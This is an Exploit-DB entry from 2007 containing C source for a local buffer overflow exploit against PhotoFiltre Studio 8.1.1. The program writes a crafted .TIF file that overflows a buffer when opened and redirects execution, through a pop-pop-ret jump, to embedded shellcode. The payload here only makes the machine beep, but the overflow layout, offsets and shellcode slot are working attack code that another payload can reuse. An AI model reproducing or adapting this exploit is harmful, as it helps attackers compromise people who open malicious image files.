PhotoFiltre Studio 8.1.1 - '.tif' Local Buffer Overflow

EDB-ID:

3772


Author:

Marsu

Type:

local


Platform:

Windows

Date:

2007-04-21


/********************************************************************************
*                                                                               *
*            Photofiltre Studio v8.1.1 .TIF File Buffer Overflow                *
*                                                                               *
*                                                                               *
* Photofiltre is vulnerable to an unspecified buffer overflow when processing a *
* crafted .TIF file.                                                            *
* This exploit just beeps (useless but incredibly noisy!!).                     *
*                                                                               *
* Tested against Win XP SP2 FR.                                                 *
* Have Fun!                                                                     *
*                                                                               *
* Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>                    *
********************************************************************************/

#include "stdio.h"
#include "stdlib.h"

// Beep Shellcode, made by xnull
// Woaw this is very ... Hum try it!
unsigned char beepsp2[] =
"\x55\x89\xE5\x83\xEC\x18\xC7\x45\xFC"
"\x77\x7A\x83\x7C"                      //Address \x77\x7A\x83\x7C = SP2
"\xC7\x44\x24\x04"
"\xD0\x03"                              //Length \xD0\x03 = 2000 (2 seconds)
"\x00\x00\xC7\x04\x24"
"\x01\x0E"                              //Frequency \x01\x0E = 3585
"\x00\x00\x8B\x45\xFC\xFF\xD0\xC9\xC3";

char tif_file_part1[] =
"\x49\x49\x2a\x00\x08\x00\x00\x00\x17\x00\xfe\x00\x04\x00\x01\x00"
"\x00\x00\x02\x00\x00\x00\x00\x01\x04\x00\x01\x00\x00\x00\xfd\x01"
"\x00\x00\x01\x01\x04\x00\x01\x00\x00\x00\xb6\x01\x00\x00\x02\x01"
"\x03\x00\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00\x83\x00"
"\x00\x00\x05\x00\x00\x00\x06\x01\x03\x00\x01\x00\x00\x00\x03\x00"
"\x00\x00\x0a\x01\xb6\x00\x01\x00\x00\x00\x01\x00\x00\x00\x11\x01"
"\x04\x00\x37\x00\x00\x00\x22\x01\x00\x00\x12\x01\x03\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x15\x01\x03\x00\x01\x00\x00\x00\x01\x00"
"\x00\x00\x16\x01\x03\x00\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01"
"\x04\x00\x37\x00\x00\x00\xfe\x01\x00\x00\x1a\x01\x05\x00\x01\x00"
"\x00\x00\xda\x02\x00\x00\x1b\x01\x05\x00\x01\x00\x00\x00\xe2\x02"
"\x00\x00\x1c\x01\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x28\x01"
"\x03\x00\x01\x00\x00\x00\x02\x00\x00\x00\x29\x01\x03\x00\x02\x00"
"\x00\x00\x00\x00\x01\x00\x31\x01\x02\x44\x43\x42\x41\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x46\x46\x46\x46\x46"
"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46"
"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46"
"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46"
"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4f\x4f\x4f\x4f\x4f"
"\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x92\x00\x92"
"\x00\x96\x00\x00\x00\x00\x00\xaf\x00\x12\x00\x00\x00\x92\x00\x49"
"\x00\x12\x00\x92\x00\xaf\x00\x92\x00\x49\x00\x49\x00\x49\x00\x58"
"\x00\xaf\x00\x12\x00\x58\x00\x00\x00\x80\x00\x00\x00\x57\x00\x12"
"\x00\x5a\x00\x12\x00\x00\x00\x00\x00\x28\x00\x12\x00\x00\x00\x46"
"\x00\xfd\x00\xd5\x00\x1b\x00\xff\x00\xef\x00\xa9\x00\xd9\x00\x00"
"\x00\x70\x00\x6c\x00\xfa\x00\x99\x00\xc5\x00\xf7\x00\xb4\x00\x48"
"\x00\xab\x00\xe9\x00\xde\x00\x1b\x00\xff\x00\xd7\x00\x64\x00\xa9"
"\x00\xd9\x00\x6e\x00\x68\x00\x70\x00\x92\x00\xcc\x00\xf2\x00\x99"
"\x00\x94\x00\xe9\x00\xad\x00\xb4\x00\x4b\x00\xc9\x00\x85\x00\xe9"
"\x00\xe5\x00\xb4\x00\x80\x00\x98\x00\x8c\x00\xe0\x00\xc4\x00\x33"
;

int main(int argc, char* argv[])
{
	FILE* tiffile;
	char evilbuff[5000];
	int offset=0;

	printf("[+] Photofiltre Studio v8.1.1 .TIF File Buffer Overflow\n");
	printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>\n");
	if (argc!=2) {
		printf("[+] Usage: %s <file.ttf>\n",argv[0]);
		return 0;
	}

	memcpy(evilbuff,tif_file_part1,sizeof(tif_file_part1)-1);
	offset=0xd5;
	memcpy(evilbuff+offset,"\x43\x43\xeb\x05\x8c\x08\xfc\x7f\x43",9); //pop pop ret in ??? + jump over EIP
	memcpy(evilbuff+offset+9,beepsp2,sizeof(beepsp2)-1);

	printf("[+] tif_file_part2 patched!\n");
	
	if ((tiffile=fopen(argv[1],"wb"))==0) {
		printf("[-] Unable to access file.\n");
		return 0;
	}
	
	fwrite( evilbuff, 1, 1360, tiffile );
	fclose(tiffile);
	printf("[+] Done. Have fun!\n");
	return 0;
	
}

// milw0rm.com [2007-04-21]